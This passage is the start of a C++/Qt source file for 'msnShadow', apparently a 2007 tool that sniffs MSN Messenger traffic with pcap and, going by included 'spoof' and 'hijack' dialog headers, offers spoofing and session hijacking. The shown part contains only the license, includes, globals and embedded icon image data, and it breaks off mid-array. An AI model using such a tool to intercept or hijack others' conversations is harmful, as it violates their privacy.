/***************************************************************************
 *   Copyright (C) 2007 by Gabriel Menezes Nunes   *
 *   gabriel@msnshadow   *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/
#include "msnshadow.h"

#include <qvariant.h>
#include <qtabwidget.h>
#include <qwidget.h>
#include <qheader.h>
#include <qlistview.h>
#include <qwidgetstack.h>
#include <qpushbutton.h>
#include <qlayout.h>
#include <qtooltip.h>
#include <qwhatsthis.h>
#include <qaction.h>
#include <qmenubar.h>
#include <qpopupmenu.h>
#include <sys/time.h>
#include <qtoolbar.h>
#include <qimage.h>
#include <qpixmap.h>
#include <qstring.h>
#include "spoofdlg.h"
#include <msnshadowitemmsg.h>
#include <qmessagebox.h>
#include <qlabel.h>
#include "msnshadowitemvideo.h"
#include <qapplication.h>
#include <qevent.h>
#include <unistd.h>
#include <qcheckbox.h>
#include <aboutdlg.h>
#include "hijackdlg.h"



//PCAP

#define __USE_BSD
#include <stdio.h>
#include <pcap.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/if_ether.h>
#include <netinet/ether.h>

msnShadow *ptrWindow;
configDlg *configPtrGlobal;
char *decoderBuffer;
int indexDecoders;
MimCtx *codec;
int indexDz;
msnShadowItemVideo *pontr;
static const unsigned char image0_data[] = { 
    0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d,
    0x49, 0x48, 0x44, 0x52, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20,
    0x08, 0x06, 0x00, 0x00, 0x00, 0x73, 0x7a, 0x7a, 0xf4, 0x00, 0x00, 0x05,
    0xc6, 0x49, 0x44, 0x41, 0x54, 0x58, 0x85, 0xc5, 0x97, 0xcb, 0x6f, 0x1b,
    0x55, 0x14, 0xc6, 0x7f, 0x33, 0xe3, 0x19, 0xdb, 0x49, 0xea, 0x3c, 0x1a,
    0xda, 0x26, 0x69, 0xe9, 0x83, 0x82, 0x1a, 0x4a, 0x21, 0xcd, 0x40, 0x17,
    0x7d, 0x00, 0x45, 0x14, 0x04, 0xaa, 0x44, 0xa9, 0x58, 0xf2, 0x86, 0x08,
    0x22, 0x51, 0x56, 0xa8, 0x1b, 0x56, 0xf0, 0x0f, 0x80, 0x04, 0x0b, 0x8a,
    0xd5, 0x96, 0x40, 0x37, 0x74, 0x01, 0x85, 0x05, 0x0b, 0x1e, 0x2a, 0x0f,
    0x51, 0x1e, 0x22, 0x2e, 0x49, 0x54, 0xa8, 0x2a, 0x8c, 0x52, 0x4a, 0xea,
    0xb4, 0x79, 0xd8, 0x49, 0x6c, 0xcf, 0x8c, 0x67, 0xe6, 0x5e, 0x16, 0x1e,
    0xc7, 0x4e, 0x6c, 0x27, 0xb4, 0x42, 0xe2, 0x48, 0x9f, 0x3c, 0xbe, 0x8f,
    0x39, 0xdf, 0x39, 0x73, 0xee, 0x39, 0xf7, 0xc0, 0xff, 0x2c, 0xca, 0xb5,
    0x2c, 0xee, 0xed, 0x1f, 0xda, 0x08, 0x72, 0x2f, 0x88, 0x1e, 0xa0, 0x07,
    0x29, 0x2a, 0xde, 0x21, 0x87, 0x91, 0x62, 0x18, 0xe1, 0x9e, 0x36, 0x19,
    0x48, 0x02, 0x22, 0x1e, 0x8f, 0xcb, 0xff, 0x84, 0x40, 0x6f, 0xff, 0xd0,
    0x33, 0xc0, 0xd3, 0xc0, 0xdd, 0x20, 0x01, 0x01, 0xaa, 0x01, 0x6a, 0xa4,
    0xb8, 0x40, 0xd8, 0xe0, 0xdb, 0x95, 0x5b, 0xce, 0x20, 0xbc, 0x13, 0xa6,
    0x3c, 0x7a, 0x0c, 0x70, 0xe3, 0xf1, 0xb8, 0xb8, 0x2e, 0x02, 0xbd, 0xfd,
    0x43, 0xdb, 0x51, 0xd4, 0x37, 0x90, 0xe2, 0x1e, 0x54, 0x0d, 0x8c, 0x16,
    0x30, 0xda, 0x30, 0xc2, 0x51, 0xd6, 0xc5, 0x66, 0xb9, 0x6b, 0x6d, 0x1a,
    0x80, 0xac, 0x0d, 0x5f, 0x8d, 0xae, 0xc7, 0xb2, 0x0b, 0xe0, 0x4c, 0x80,
    0x3d, 0x05, 0xd2, 0x05, 0xa4, 0x85, 0x6f, 0xbf, 0x62, 0xf2, 0xfe, 0x7b,
    0x80, 0x5d, 0x8b, 0x48, 0x5d, 0x02, 0x81, 0xd5, 0xc7, 0x00, 0x88, 0xae,
    0xc1, 0x68, 0x5a, 0xc5, 0x73, 0x3b, 0xc6, 0xd8, 0xb6, 0xa9, 0x89, 0x5b,
    0xd6, 0x36, 0x10, 0x31, 0xd4, 0xaa, 0x3d, 0x63, 0x93, 0x0e, 0x3f, 0xfe,
    0x3e, 0xc3, 0x77, 0xe7, 0xe1, 0x97, 0x51, 0x1d, 0x72, 0x17, 0x8b, 0x13,
    0x7e, 0xe1, 0x63, 0x93, 0xe3, 0xcf, 0x03, 0xb3, 0xf1, 0x78, 0xdc, 0x5b,
    0x96, 0xc0, 0xbc, 0x72, 0x2d, 0x0c, 0xb1, 0x5b, 0x78, 0x7c, 0xfb, 0xdf,
    0x3c, 0xb2, 0xab, 0x9d, 0xd6, 0xa6, 0x50, 0x5d, 0x6f, 0xc9, 0x45, 0xaf,
    0xfa, 0x6e, 0x24, 0xc3, 0x91, 0xd3, 0x3a, 0x57, 0xc6, 0xc7, 0xc1, 0xcb,
    0x82, 0x70, 0x87, 0x4d, 0x79, 0xec, 0x01, 0x60, 0xa2, 0xd2, 0x13, 0x5a,
    0x5d, 0xe5, 0xa1, 0x06, 0xd6, 0xad, 0xeb, 0xe0, 0x95, 0x07, 0xb3, 0xec,
    0xbb, 0xb3, 0x0d, 0x3d, 0xa4, 0xe2, 0x09, 0xea, 0xc2, 0x17, 0x72, 0x01,
    0xba, 0xda, 0xc3, 0xec, 0xd9, 0x02, 0xe9, 0xac, 0xc7, 0xe8, 0x84, 0x02,
    0xd2, 0x5f, 0x9d, 0x92, 0x5b, 0x6f, 0xed, 0x64, 0xe8, 0x13, 0xd3, 0x34,
    0xbd, 0x44, 0x22, 0x21, 0xab, 0x08, 0xf4, 0xf6, 0xff, 0xba, 0x1d, 0x94,
    0xcf, 0xd0, 0x74, 0xba, 0xba, 0xba, 0x38, 0xbc, 0x5f, 0xb2, 0x61, 0x75,
    0x04, 0xd7, 0x93, 0xd7, 0x85, 0x90, 0xa6, 0xb0, 0x6d, 0x43, 0x94, 0xab,
    0xb3, 0x82, 0x4b, 0x53, 0x00, 0xf2, 0xe6, 0x94, 0xbb, 0xf1, 0x87, 0x4e,
    0xf5, 0xb7, 0x4b, 0x01, 0x09, 0x16, 0xfb, 0xf4, 0x38, 0xf8, 0x10, 0xdb,
    0xc6, 0xb3, 0x7b, 0xa6, 0x88, 0x35, 0x34, 0x90, 0x77, 0xaa, 0x4f, 0xd2,
    0xd7, 0x43, 0x33, 0xdc, 0x7b, 0x47, 0x73, 0xdd, 0xcf, 0xb1, 0x58, 0x9e,
    0xdc, 0x1b, 0xe3, 0xca, 0x9c, 0xce, 0x1f, 0x7f, 0x66, 0xc1, 0x68, 0x79,
    0x0d, 0xc1, 0x59, 0xc0, 0x05, 0xdc, 0x79, 0x0f, 0xf4, 0xf6, 0x27, 0x9e,
    0x01, 0xf9, 0x02, 0xd1, 0x4e, 0x9e, 0xd8, 0x91, 0xa6, 0x7b, 0x7d, 0x13,
    0xae, 0x2f, 0x6b, 0xe2, 0xe0, 0xee, 0x95, 0x9c, 0xfc, 0x66, 0x92, 0x55,
    0xad, 0x7a, 0xdd, 0x35, 0x95, 0x90, 0xc0, 0x86, 0x76, 0xc1, 0xb7, 0xc9,
    0x16, 0x70, 0x67, 0x3b, 0x52, 0xa2, 0x3b, 0xd3, 0xa9, 0x0c, 0x9f, 0x35,
    0x4d, 0xb3, 0x50, 0x0e, 0x65, 0x29, 0x9e, 0x06, 0x8d, 0xd5, 0xed, 0x2b,
    0xd8, 0xb2, 0xbe, 0x91, 0x9c, 0x2d, 0xea, 0x02, 0xe0, 0xd0, 0x81, 0x0e,
    0x7e, 0x3e, 0x9f, 0x5d, 0x72, 0x5d, 0x25, 0x62, 0x8d, 0x3a, 0x8f, 0xf6,
    0xcc, 0x80, 0xa2, 0x83, 0x16, 0x39, 0x08, 0xb4, 0x00, 0xba, 0x0a, 0xd0,
    0xfb, 0xe2, 0x2f, 0x1b, 0x81, 0xbb, 0x89, 0xac, 0xe4, 0xbe, 0xcd, 0x53,
    0x78, 0x3e, 0xe4, 0x1d, 0xbf, 0x2e, 0x4a, 0x72, 0xe8, 0x40, 0x07, 0xe7,
    0x46, 0xf3, 0x4b, 0xae, 0xcd, 0x3b, 0x3e, 0x33, 0x39, 0x8f, 0x3f, 0x53,
    0x79, 0x24, 0x1a, 0x44, 0x56, 0x82, 0xa2, 0xf5, 0x0c, 0x3a, 0x0f, 0x77,
    0x03, 0x91, 0x52, 0x0c, 0xec, 0x05, 0xc0, 0x68, 0xa3, 0x3d, 0x36, 0x4b,
    0xce, 0xaa, 0x9b, 0xb8, 0xaa, 0xe4, 0xd0, 0x81, 0x0e, 0xde, 0x3a, 0x95,
    0x62, 0x55, 0x8b, 0x5e, 0x35, 0x37, 0x3e, 0x6d, 0xf3, 0xd7, 0xb4, 0xc2,
    0x4f, 0x63, 0x5d, 0xe5, 0x41, 0xc3, 0x02, 0x6b, 0x1c, 0xf4, 0xe6, 0x5d,
    0xc0, 0xd9, 0x12, 0x81, 0x1e, 0x80, 0x35, 0xcd, 0x02, 0x09, 0x0b, 0xac,
    0xbc, 0x16, 0x12, 0x4d, 0xd1, 0x85, 0xc9, 0x69, 0x3a, 0xeb, 0xf3, 0xd3,
    0xd8, 0xfa, 0x05, 0x63, 0x46, 0x38, 0x4a, 0x01, 0x40, 0x35, 0xb6, 0x00,
    0xd1, 0x32, 0x01, 0x2d, 0x42, 0x6b, 0xb4, 0x40, 0xf6, 0x1a, 0xac, 0xaf,
    0x45, 0x02, 0xc0, 0x76, 0x05, 0xe7, 0xaf, 0x44, 0x01, 0x1d, 0xa5, 0x54,
    0xaa, 0x82, 0xc3, 0xa4, 0xa9, 0x14, 0xe3, 0x40, 0xf5, 0x37, 0x23, 0xca,
    0x9f, 0x00, 0xd4, 0x08, 0xb1, 0x70, 0x81, 0x9c, 0x53, 0x26, 0xd0, 0x18,
    0xae, 0x4e, 0xb7, 0xcb, 0x91, 0x78, 0xee, 0xed, 0x69, 0x2e, 0x4c, 0xb7,
    0x2d, 0x18, 0x97, 0x12, 0x14, 0xa5, 0x4c, 0x82, 0x50, 0x23, 0x38, 0x96,
    0x42, 0x29, 0x08, 0x09, 0x52, 0x72, 0xce, 0x35, 0x98, 0xb3, 0x98, 0xc7,
    0x62, 0xb1, 0x5d, 0xc1, 0xaf, 0x7f, 0x87, 0x97, 0x24, 0x71, 0xf4, 0xa5,
    0xb6, 0xaa, 0x31, 0xa5, 0x7e, 0xc9, 0x53, 0xcb, 0x1e, 0x10, 0x36, 0x69,
    0x2b, 0x42, 0x48, 0x2d, 0x27, 0x9e, 0xf1, 0x6c, 0x79, 0xe5, 0x62, 0xab,
    0xea, 0xc9, 0x9e, 0xd7, 0xeb, 0xcf, 0xcd, 0x13, 0xf1, 0x72, 0xf3, 0x63,
    0x01, 0x01, 0x39, 0x8c, 0x6f, 0xef, 0xce, 0x38, 0x61, 0x3c, 0x59, 0xbb,
    0xe0, 0xac, 0x30, 0xdc, 0x22, 0x4f, 0x09, 0x50, 0x1d, 0xf1, 0xcb, 0x29,
    0x07, 0x08, 0xa9, 0xe0, 0xfa, 0x14, 0x4b, 0xb5, 0x74, 0x93, 0x80, 0x28,
    0x6a, 0x93, 0x62, 0x18, 0x45, 0x23, 0x67, 0x79, 0xe8, 0x5a, 0x6d, 0x02,
    0x92, 0xa5, 0xe3, 0x61, 0x29, 0xe5, 0x7a, 0x45, 0xc5, 0xb1, 0xec, 0x42,
    0xf1, 0xc1, 0x77, 0x92, 0x68, 0xb8, 0x45, 0x6d, 0xc2, 0x3d, 0x8d, 0xa6,
    0x41, 0x61, 0x0a, 0x55, 0xed, 0x58, 0xda, 0x8c, 0x6b, 0x54, 0x0e, 0x41,
    0xe4, 0x97, 0xa4, 0x30, 0x15, 0xfc, 0xa6, 0x13, 0x44, 0xb1, 0x43, 0x00,
    0x26, 0x03, 0xc9, 0x41, 0x5e, 0x38, 0x83, 0x35, 0xb1, 0x53, 0x57, 0xda,
    0x09, 0x55, 0x15, 0xe9, 0xb2, 0xa4, 0xad, 0x85, 0xee, 0xaf, 0xa5, 0xbc,
    0x35, 0xea, 0xd6, 0xdc, 0xeb, 0xf9, 0x80, 0x35, 0x01, 0xc2, 0x1b, 0x31,
    0xa3, 0x9f, 0x5f, 0x04, 0xac, 0x92, 0xbf, 0x05, 0xc2, 0x3b, 0x81, 0xca,
    0xce, 0xd9, 0xcc, 0x24, 0x37, 0x75, 0x35, 0xd6, 0x25, 0xd0, 0x1a, 0xb1,
    0x80, 0x18, 0x00, 0x4f, 0xbd, 0x35, 0xcb, 0xa6, 0xd6, 0xfa, 0x64, 0x17,
    0x4b, 0x72, 0x2c, 0x57, 0xfc, 0xfe, 0x5e, 0xf6, 0x0b, 0x34, 0x72, 0x80,
    0xa5, 0x01, 0x24, 0x12, 0x09, 0xf6, 0xf7, 0x2a, 0x23, 0x29, 0xd5, 0xbc,
    0xdf, 0x73, 0xb2, 0x6b, 0xdb, 0x5b, 0x63, 0xb4, 0x44, 0x7d, 0x22, 0xa1,
    0xda, 0x78, 0xc8, 0x6c, 0xe0, 0xe5, 0x77, 0x27, 0xeb, 0xce, 0xd7, 0x82,
    0xe5, 0x08, 0x52, 0x97, 0x2f, 0x15, 0xad, 0x57, 0x3e, 0x78, 0x13, 0xb8,
    0x02, 0x64, 0x2a, 0x23, 0xce, 0xc5, 0xb7, 0x0f, 0xa3, 0x45, 0xbf, 0x4d,
    0x5e, 0x1c, 0x63, 0xf7, 0xed, 0x37, 0xa0, 0x6b, 0xb5, 0x6f, 0xd5, 0xaf,
    0x0e, 0x5c, 0x66, 0xc5, 0xd2, 0xe9, 0x60, 0x81, 0xb8, 0xbe, 0x42, 0xf2,
    0xe2, 0x44, 0xf1, 0x8f, 0x9d, 0x7a, 0x87, 0x30, 0x19, 0x20, 0x43, 0xe5,
    0x7d, 0x20, 0x91, 0x48, 0xc8, 0xfd, 0x66, 0x28, 0x95, 0x92, 0xb7, 0xa5,
    0x7d, 0xa1, 0x3e, 0x38, 0x99, 0x71, 0xd8, 0xdc, 0x69, 0x60, 0xe8, 0x1a,
    0xba, 0xa6, 0x5c, 0x37, 0x54, 0x3c, 0xbe, 0x1f, 0x4e, 0x93, 0xb7, 0x5d,
    0x28, 0xa4, 0xdf, 0x30, 0xf5, 0x53, 0x5f, 0x01, 0x29, 0x20, 0x13, 0x8f,
    0xc7, 0xfd, 0xc5, 0x67, 0xcb, 0x33, 0x19, 0x38, 0x82, 0x6f, 0x1d, 0x9e,
    0xcb, 0x17, 0xf8, 0x72, 0x30, 0x8d, 0xeb, 0x58, 0x84, 0x75, 0xf5, 0xba,
    0xe0, 0x3a, 0x16, 0x5f, 0x0e, 0xa6, 0x99, 0xcb, 0x17, 0x8a, 0xca, 0xb5,
    0x93, 0x1f, 0x05, 0xae, 0x4f, 0x03, 0x1e, 0x2c, 0xba, 0x13, 0x26, 0x12,
    0x09, 0x4c, 0xd3, 0xf4, 0x3b, 0x19, 0x1a, 0x4a, 0xc9, 0xad, 0x33, 0xae,
    0xd0, 0xf6, 0x5d, 0x18, 0xb3, 0x71, 0x85, 0xca, 0xba, 0x95, 0x2a, 0x7a,
    0x48, 0x25, 0xa4, 0xb2, 0x2c, 0x14, 0xe9, 0x31, 0xf8, 0x47, 0x9e, 0x1f,
    0xce, 0x65, 0x70, 0x3d, 0x51, 0xa9, 0x3c, 0x05, 0x5c, 0x05, 0xac, 0x52,
    0xd7, 0x54, 0x33, 0x4b, 0xf7, 0xf5, 0xf5, 0xa9, 0x40, 0xc3, 0xa0, 0xf7,
    0xd8, 0xbd, 0x18, 0x2d, 0xaf, 0xa1, 0x68, 0xbd, 0x61, 0x5d, 0xe5, 0xc6,
    0x35, 0x0d, 0x6c, 0xed, 0x14, 0xb4, 0xb5, 0x35, 0xa3, 0x69, 0x0b, 0x8f,
    0xa3, 0xef, 0xbb, 0x4c, 0x4f, 0xcf, 0x70, 0xee, 0xb2, 0xca, 0x5f, 0xe3,
    0x79, 0x1c, 0x57, 0x80, 0xf0, 0x46, 0xb0, 0x53, 0xef, 0x98, 0xe1, 0xcf,
    0xce, 0x06, 0x96, 0x5f, 0x05, 0xf2, 0x95, 0xd7, 0xf2, 0xba, 0x65, 0x22,
    0x20, 0x11, 0x01, 0x5a, 0x07, 0xe5, 0xe3, 0xcf, 0xa2, 0x45, 0x0e, 0xa2,
    0x68, 0x3d, 0xa5, 0xf9, 0xa8, 0x01, 0xed, 0xcd, 0xc5, 0x18, 0x9e, 0x9c,
    0xf1, 0xb0, 0x0a, 0x15, 0x9b, 0x85, 0x37, 0x82, 0x97, 0xfd, 0xc2, 0xd4,
    0x3e, 0xfc, 0x34, 0x08, 0xb6, 0xc9, 0xc0, 0xed, 0x55, 0xdd, 0xd1, 0x92,
    0xad, 0x59, 0x5f, 0x5f, 0x9f, 0x42, 0xb1, 0x5e, 0x34, 0x02, 0x2d, 0x83,
    0xce, 0xc3, 0xdd, 0xe8, 0xcd, 0xbb, 0x50, 0x8d, 0x2d, 0xa8, 0xfa, 0x66,
    0xa4, 0x2c, 0xef, 0x97, 0x6e, 0x12, 0xdf, 0x49, 0x52, 0x48, 0x27, 0x82,
    0x24, 0x93, 0x03, 0x66, 0x02, 0x02, 0x39, 0xc0, 0xab, 0xd5, 0xac, 0xfe,
    0xab, 0xe6, 0x34, 0xf0, 0x86, 0x1e, 0x78, 0x24, 0x1a, 0x20, 0x12, 0x8c,
    0x95, 0x02, 0x59, 0x50, 0xbc, 0x6a, 0xdb, 0x80, 0x15, 0xc0, 0x66, 0x99,
    0xe6, 0xf4, 0x1f, 0x78, 0x7e, 0x48, 0xde, 0x2c, 0x01, 0x6f, 0x64, 0x00,
    0x00, 0x00, 0x00, 0x49, 0x45, 0x4e, 0x44, 0xae, 0x42, 0x60, 0x82
};

static const unsigned char image1_data[] = { 
    0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d,
    0x49, 0x48, 0x44, 0x52, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20,
    0x08, 0x06, 0x00, 0x00, 0x00, 0x73, 0x7a, 0x7a, 0xf4, 0x00, 0x00, 0x05,
    0xf2, 0x49, 0x44, 0x41, 0x54, 0x58, 0x85, 0xc5, 0x97, 0xef, 0x6f, 0x5b,
    0x57, 0x19, 0xc7, 0x3f, 0xe7, 0xc6, 0xd7, 0xb9, 0x71, 0x1b, 0x37, 0x4d,
    0x0c, 0x0d, 0xcd, 0xba, 0xb6, 0xd3, 0x0a, 0x4d, 0x5a, 0xe1, 0x2c, 0x57,
    0x5b, 0x91, 0x86, 0x4a, 0x0b, 0x82, 0x37, 0x93, 0x60, 0x4c, 0xa5, 0x68,
    0xaa, 0x36, 0xb2, 0x12, 0x6b, 0x7b, 0x01, 0x42, 0x88, 0xa9, 0xbc, 0x99,
    0x54, 0x8d, 0x3f, 0x80, 0x0a, 0x21, 0xa4, 0x4d, 0x56, 0x5b, 0x22, 0xed,
    0xcd, 0xc6, 0x04, 0x08, 0xa9, 0x43, 0x10, 0x45, 0x2d, 0x1d, 0x2b, 0x2b,
    0x10, 0xa7, 0x49, 0xb5, 0x4e, 0x4a, 0x67, 0x20, 0xa9, 0xd2, 0xfc, 0x72,
    0x1c, 0xdb, 0xb3, 0xaf, 0xaf, 0x7d, 0xaf, 0xcf, 0xe1, 0x85, 0xed, 0x1b,
    0x3b, 0xf1, 0x4d, 0xba, 0x09, 0x89, 0x47, 0xfa, 0x4a, 0xf7, 0xde, 0xf3,
    0x9c, 0xe7, 0xfb, 0x3d, 0xcf, 0x39, 0xf7, 0x9c, 0xe7, 0xc0, 0xff, 0xd9,
    0xc4, 0x27, 0x71, 0x9e, 0x32, 0x8f, 0x1d, 0x54, 0x4a, 0x9d, 0x94, 0x30,
    0x08, 0x0c, 0x4a, 0x54, 0x43, 0x0c, 0x31, 0x2d, 0x61, 0xba, 0x0c, 0x57,
    0x47, 0xcd, 0x68, 0x12, 0x90, 0xf1, 0x78, 0x5c, 0xfd, 0x4f, 0x04, 0x4c,
    0x99, 0xc7, 0x5e, 0x00, 0x86, 0x81, 0xe3, 0x4a, 0x29, 0x24, 0x10, 0x04,
    0x8c, 0x5a, 0xbb, 0x0d, 0xd8, 0x34, 0x71, 0xdd, 0x70, 0x11, 0x6f, 0x5c,
    0x34, 0xa3, 0x97, 0x00, 0x27, 0x1e, 0x8f, 0xcb, 0x4f, 0x25, 0x60, 0xca,
    0x3c, 0xf6, 0x98, 0x06, 0x17, 0x24, 0x7c, 0xa5, 0x4d, 0x29, 0xba, 0x80,
    0xdd, 0x42, 0x10, 0x0a, 0xb6, 0x93, 0x7b, 0xa8, 0x8f, 0xb5, 0xc7, 0xcd,
    0xaa, 0x63, 0xbe, 0xc0, 0xfe, 0xf1, 0xab, 0x94, 0x4a, 0x36, 0x29, 0x29,
    0x59, 0x15, 0x02, 0x47, 0x49, 0x40, 0x14, 0x6d, 0x78, 0x79, 0xd4, 0x8c,
    0xfe, 0x1a, 0xb0, 0x5b, 0x09, 0xf1, 0x15, 0x50, 0x1b, 0xf5, 0x25, 0x80,
    0x5e, 0xe0, 0xb3, 0xc1, 0x76, 0xe6, 0xbf, 0x3f, 0xcc, 0xce, 0xa3, 0x47,
    0x08, 0x7d, 0xfe, 0x10, 0x9a, 0x61, 0x6c, 0xea, 0x53, 0x9a, 0xbf, 0x4f,
    0xf6, 0xe6, 0xdf, 0xe1, 0xfa, 0xbb, 0xe8, 0x13, 0x93, 0xcc, 0xaa, 0x0a,
    0x00, 0x65, 0xc4, 0xef, 0x2e, 0x9b, 0xd1, 0x11, 0x20, 0x17, 0x8f, 0xc7,
    0xdd, 0x6d, 0x05, 0xd4, 0xc9, 0xdb, 0x95, 0xe2, 0x90, 0x10, 0xcc, 0x9f,
    0x79, 0x96, 0xc8, 0xd3, 0xdf, 0x22, 0xd0, 0xb5, 0xcb, 0x37, 0x5b, 0x62,
    0xc3, 0x6c, 0x67, 0xfe, 0xfa, 0x1e, 0xfa, 0xeb, 0x71, 0x16, 0x17, 0x17,
    0xc9, 0xa3, 0x70, 0x11, 0xd3, 0x17, 0xcd, 0xe8, 0x37, 0x80, 0x95, 0xc6,
    0x4c, 0x6c, 0x12, 0x50, 0x27, 0x0f, 0x01, 0x7b, 0xf6, 0xed, 0xa3, 0x3c,
    0x72, 0x96, 0x4e, 0x73, 0xc8, 0x97, 0x78, 0x2b, 0x73, 0x56, 0xd3, 0xa4,
    0x2f, 0x5d, 0xc6, 0xba, 0xf6, 0x17, 0xf2, 0x28, 0x6c, 0xc4, 0x3b, 0xa3,
    0x66, 0xf4, 0xbb, 0x80, 0x55, 0x17, 0xd1, 0xd6, 0xd8, 0xe1, 0xd6, 0xd0,
    0x13, 0x8f, 0x09, 0x21, 0xde, 0xd1, 0x95, 0xa2, 0xaf, 0xaf, 0x0f, 0xf5,
    0xd3, 0x97, 0x31, 0x0e, 0xec, 0x47, 0x39, 0x0e, 0xf9, 0xf7, 0x6f, 0x52,
    0x9a, 0x9d, 0x23, 0x10, 0x89, 0xa0, 0x1c, 0x67, 0x4b, 0xd4, 0x7d, 0xdb,
    0x1f, 0xde, 0x47, 0xc7, 0x17, 0x8f, 0x22, 0x57, 0x52, 0x30, 0x77, 0x0f,
    0x89, 0x3a, 0xf4, 0xc8, 0xc2, 0xd2, 0xdf, 0xee, 0xec, 0xed, 0xbd, 0x67,
    0x9a, 0xa6, 0x9b, 0x48, 0x24, 0x08, 0x6c, 0x10, 0x7d, 0xb9, 0xa2, 0x14,
    0x47, 0x85, 0x20, 0x7d, 0x76, 0x98, 0x50, 0x38, 0x8c, 0x2a, 0x16, 0xb1,
    0xee, 0x7c, 0x48, 0xe4, 0xf4, 0x29, 0x00, 0x52, 0x6f, 0xbd, 0x4d, 0x68,
    0xa0, 0xdf, 0x77, 0xd4, 0xad, 0x7c, 0xc3, 0xcf, 0x9f, 0x41, 0x5f, 0x5a,
    0x26, 0x7f, 0x77, 0x86, 0x2e, 0x78, 0x15, 0x98, 0x04, 0x1c, 0xc0, 0xf1,
    0x32, 0x90, 0x18, 0x7a, 0xe2, 0x05, 0x05, 0x2f, 0xee, 0x45, 0x90, 0x79,
    0xfe, 0x0c, 0x3b, 0xfb, 0x0f, 0xa3, 0x1c, 0x07, 0xfb, 0xa3, 0xa4, 0x17,
    0x10, 0x20, 0x74, 0x64, 0x80, 0xec, 0xb5, 0xeb, 0x68, 0xa1, 0xd0, 0xa6,
    0x91, 0xfb, 0xf9, 0x06, 0xc2, 0x61, 0xe4, 0x81, 0xfd, 0x74, 0xbd, 0xfb,
    0x1e, 0x39, 0xe4, 0xe7, 0x06, 0x16, 0x96, 0x32, 0xd3, 0x7b, 0x7b, 0x27,
    0x4d, 0xd3, 0x2c, 0x6b, 0x75, 0x67, 0x89, 0x1a, 0x6e, 0x13, 0x82, 0x9d,
    0xbd, 0x7b, 0xd8, 0xf1, 0x85, 0xc3, 0x48, 0xcb, 0x42, 0x5a, 0x56, 0x53,
    0xc0, 0xba, 0x45, 0x4e, 0x9f, 0xa2, 0x34, 0x3b, 0xe7, 0xf9, 0x48, 0xcb,
    0xa2, 0x34, 0x3b, 0xe7, 0xeb, 0x2b, 0x2d, 0x0b, 0x7d, 0x57, 0x98, 0xec,
    0xb7, 0xbf, 0x89, 0x2e, 0x34, 0x0c, 0x78, 0x06, 0xe8, 0x02, 0x74, 0x0d,
    0xe0, 0x9f, 0x43, 0x8f, 0x1f, 0x04, 0x8e, 0xf7, 0x28, 0x45, 0xfa, 0xab,
    0x27, 0xc0, 0x75, 0xa8, 0x14, 0x2c, 0x2a, 0x05, 0xcb, 0x37, 0xd5, 0x91,
    0xd3, 0xa7, 0x70, 0x56, 0x52, 0x54, 0x0a, 0x16, 0xce, 0x4a, 0xaa, 0x25,
    0x79, 0xdd, 0xdc, 0x4c, 0x16, 0xeb, 0x5f, 0xff, 0xa6, 0x4d, 0x29, 0x7a,
    0x94, 0x42, 0x43, 0x0d, 0x3e, 0x35, 0x71, 0xab, 0x1f, 0x30, 0xea, 0x6b,
    0xe0, 0x24, 0x54, 0x37, 0x99, 0x8f, 0x23, 0x11, 0xa4, 0xb5, 0x4e, 0x9c,
    0x7a, 0xeb, 0x6d, 0xdf, 0xe0, 0x91, 0xd3, 0xa7, 0xb6, 0x6c, 0x07, 0x98,
    0xff, 0xc9, 0x39, 0xfa, 0x6e, 0xfe, 0xc3, 0x7b, 0xb7, 0x84, 0x60, 0x51,
    0x29, 0xc2, 0xf0, 0x24, 0x30, 0x59, 0x9f, 0x82, 0x41, 0x00, 0xb5, 0x67,
    0x0f, 0x48, 0x49, 0xa5, 0x50, 0x68, 0xc2, 0xd2, 0xe5, 0xd1, 0x2d, 0x33,
    0xe1, 0x67, 0xb3, 0xe7, 0x7f, 0xd6, 0x44, 0x0e, 0x10, 0x0a, 0xb6, 0x03,
    0x10, 0x44, 0x1c, 0x06, 0x3a, 0x3c, 0x01, 0x06, 0x82, 0x72, 0x77, 0x37,
    0x32, 0x9f, 0x6f, 0x89, 0x85, 0x5f, 0xfe, 0xca, 0x97, 0xa8, 0x95, 0xa5,
    0x47, 0x5e, 0xa2, 0x73, 0xfe, 0x3e, 0x68, 0x5a, 0x15, 0x75, 0xd3, 0x34,
    0x74, 0xa1, 0x11, 0x84, 0x47, 0x01, 0xc3, 0x6b, 0x31, 0x80, 0x72, 0xb8,
    0xb3, 0x69, 0x61, 0x6d, 0xb4, 0x07, 0x16, 0x71, 0xfc, 0x6b, 0x74, 0xcf,
    0xdc, 0xa5, 0x7b, 0xe6, 0x6e, 0xf5, 0x5d, 0xca, 0x26, 0x11, 0x3b, 0xaa,
    0x07, 0x9a, 0xa0, 0xbe, 0x08, 0xa9, 0xed, 0x88, 0xc1, 0x7c, 0x01, 0x72,
    0x1f, 0xaf, 0x63, 0x83, 0x49, 0xdb, 0x26, 0x3d, 0xf2, 0xd2, 0xb6, 0xe4,
    0x9b, 0xac, 0x31, 0x03, 0x1b, 0x5a, 0xbc, 0x8d, 0xc8, 0x06, 0x8c, 0x4c,
    0x06, 0xa5, 0xeb, 0xeb, 0xcd, 0x4b, 0xcb, 0xde, 0xa3, 0x37, 0x9a, 0xeb,
    0xe3, 0x5b, 0x0b, 0xb8, 0x3e, 0xde, 0x5a, 0x44, 0x83, 0x90, 0x82, 0x10,
